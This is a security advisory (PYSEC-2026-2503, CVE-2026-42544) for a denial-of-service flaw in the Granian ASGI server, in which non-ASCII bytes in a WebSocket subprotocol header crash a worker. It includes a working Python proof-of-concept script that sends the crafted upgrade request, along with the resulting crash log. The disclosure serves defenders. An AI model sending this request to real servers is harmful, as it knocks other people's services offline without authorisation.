PYSEC-2026-2503
Vulnerability from pysec - Published: 2026-07-13 15:15 - Updated: 2026-07-13 16:04Summary
Granian aborts a worker process when an unauthenticated client sends a WebSocket upgrade request whose Sec-WebSocket-Protocol header contains non-ASCII bytes.
The crash happens in Granian's WebSocket scope construction path, before the ASGI application is invoked.
This is a single-request Denial Of Service against one worker. Repeating the request across workers takes the service offline.
Details
https://github.com/emmett-framework/granian/blob/bdd5b0fbbb2aca6f2f4c0d2700c244d190958035/src/asgi/utils.rs#L122-L125
HeaderValue::to_str() returns Err for bytes outside visible ASCII. The subsequent .unwrap() panics.
In release builds Granian sets panic = "abort", so this panic terminates the worker instead of being handled as a normal request error.
PoC
Step 1.
starts a Granian ASGI server
# app.py
async def app(scope, receive, send):
if scope["type"] == "websocket":
await receive()
await send({"type": "websocket.accept"})
return
await send({"type": "http.response.start", "status": 200, "headers": []})
await send({"type": "http.response.body", "body": b"ok"})
granian --interface asgi app:app --host 127.0.0.1 --port 8000
Step 2.
sending a raw upgrade request with Sec-WebSocket-Protocol: \x80\xff reached this code path and caused the worker to abort.
# ws-subproto-crash.py
import base64, os, socket, sys
host, port, path = sys.argv[1], int(sys.argv[2]), sys.argv[3]
key = base64.b64encode(os.urandom(16)).decode()
req = (
f"GET {path} HTTP/1.1\r\nHost: {host}:{port}\r\n"
"Upgrade: websocket\r\nConnection: Upgrade\r\n"
f"Sec-WebSocket-Key: {key}\r\nSec-WebSocket-Version: 13\r\n"
).encode() + b"Sec-WebSocket-Protocol: \x80\xff\r\n\r\n"
with socket.create_connection((host, port), timeout=5) as s:
s.sendall(req)
print(s.recv(4096))
python ws-subproto-crash.py 127.0.0.1 8000 /
Observed server output:
thread '<unnamed>' panicked at src/asgi/utils.rs:125:44:
called `Result::unwrap()` on an `Err` value: ToStrError { _priv: () }
[ERROR] Unexpected exit from worker-1
[INFO] Shutting down granian
Impact
- Unauthenticated remote denial of service
- One crafted request kills one worker
- The application is never reached, so application-level authentication or routing does not mitigate the issue
| Name | purl | granian | pkg:pypi/granian |
|---|
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "granian",
"purl": "pkg:pypi/granian"
},
"ranges": [
{
"events": [
{
"introduced": "1.2.0"
},
{
"fixed": "2.7.4"
}
],
"type": "ECOSYSTEM"
}
],
"versions": [
"1.2.3",
"1.3.0",
"1.3.1",
"1.3.2",
"1.4.0",
"1.4.1",
"1.4.2",
"1.4.3",
"1.4.4",
"1.5.0",
"1.5.1",
"1.5.2",
"1.6.0",
"1.6.1",
"1.6.2",
"1.6.3",
"1.6.4",
"1.7.0",
"1.7.1",
"1.7.2",
"1.7.3",
"1.7.4",
"1.7.5",
"1.7.6",
"2.0.0",
"2.0.1",
"2.1.0",
"2.1.1",
"2.1.2",
"2.2.0",
"2.2.1",
"2.2.2",
"2.2.3",
"2.2.4",
"2.2.5",
"2.2.6",
"2.3.0",
"2.3.1",
"2.3.2",
"2.3.3",
"2.3.4",
"2.4.0",
"2.4.1",
"2.4.2",
"2.5.0",
"2.5.1",
"2.5.2",
"2.5.3",
"2.5.4",
"2.5.5",
"2.5.6",
"2.5.7",
"2.6.0",
"2.6.1",
"2.7.0",
"2.7.1",
"2.7.2",
"2.7.3"
]
}
],
"aliases": [
"CVE-2026-42544",
"GHSA-vrg7-482j-p6f6"
],
"details": "### Summary\n\nGranian aborts a worker process when an unauthenticated client sends a WebSocket upgrade request whose `Sec-WebSocket-Protocol` header contains non-ASCII bytes.\n\nThe crash happens in Granian\u0027s WebSocket scope construction path, before the ASGI application is invoked.\n\nThis is a single-request Denial Of Service against one worker. Repeating the request across workers takes the service offline.\n\n### Details\n\nhttps://github.com/emmett-framework/granian/blob/bdd5b0fbbb2aca6f2f4c0d2700c244d190958035/src/asgi/utils.rs#L122-L125\n\n`HeaderValue::to_str()` returns `Err` for bytes outside visible ASCII. The subsequent `.unwrap()` panics.\n\nIn release builds Granian sets `panic = \"abort\"`, so this panic terminates the worker instead of being handled as a normal request error.\n\n\n### PoC\n\n#### Step 1.\nstarts a Granian ASGI server\n\n```python\n# app.py\nasync def app(scope, receive, send):\n if scope[\"type\"] == \"websocket\":\n await receive()\n await send({\"type\": \"websocket.accept\"})\n return\n\n await send({\"type\": \"http.response.start\", \"status\": 200, \"headers\": []})\n await send({\"type\": \"http.response.body\", \"body\": b\"ok\"})\n```\n\n```bash\ngranian --interface asgi app:app --host 127.0.0.1 --port 8000\n```\n\n#### Step 2.\nsending a raw upgrade request with `Sec-WebSocket-Protocol: \\x80\\xff` reached this code path and caused the worker to abort.\n\n```python\n# ws-subproto-crash.py\nimport base64, os, socket, sys\n\nhost, port, path = sys.argv[1], int(sys.argv[2]), sys.argv[3]\nkey = base64.b64encode(os.urandom(16)).decode()\n\nreq = (\n f\"GET {path} HTTP/1.1\\r\\nHost: {host}:{port}\\r\\n\"\n \"Upgrade: websocket\\r\\nConnection: Upgrade\\r\\n\"\n f\"Sec-WebSocket-Key: {key}\\r\\nSec-WebSocket-Version: 13\\r\\n\"\n).encode() + b\"Sec-WebSocket-Protocol: \\x80\\xff\\r\\n\\r\\n\"\n\nwith socket.create_connection((host, port), timeout=5) as s:\n s.sendall(req)\n print(s.recv(4096))\n```\n```bash\npython ws-subproto-crash.py 127.0.0.1 8000 /\n```\n\n\nObserved server output:\n\n```\nthread \u0027\u003cunnamed\u003e\u0027 panicked at src/asgi/utils.rs:125:44:\ncalled `Result::unwrap()` on an `Err` value: ToStrError { _priv: () }\n[ERROR] Unexpected exit from worker-1\n[INFO] Shutting down granian\n```\n\n\n### Impact\n\n- Unauthenticated remote denial of service\n- One crafted request kills one worker\n- The application is never reached, so application-level authentication or routing does not mitigate the issue",
"id": "PYSEC-2026-2503",
"modified": "2026-07-13T16:04:12.900151Z",
"published": "2026-07-13T15:15:39.488346Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/emmett-framework/granian/security/advisories/GHSA-vrg7-482j-p6f6"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42544"
},
{
"type": "PACKAGE",
"url": "https://github.com/emmett-framework/granian"
},
{
"type": "PACKAGE",
"url": "https://pypi.org/project/granian"
},
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-vrg7-482j-p6f6"
}
],
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Granian vulnerable to unauthenticated DoS via WebSocket subprotocol header panic"
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.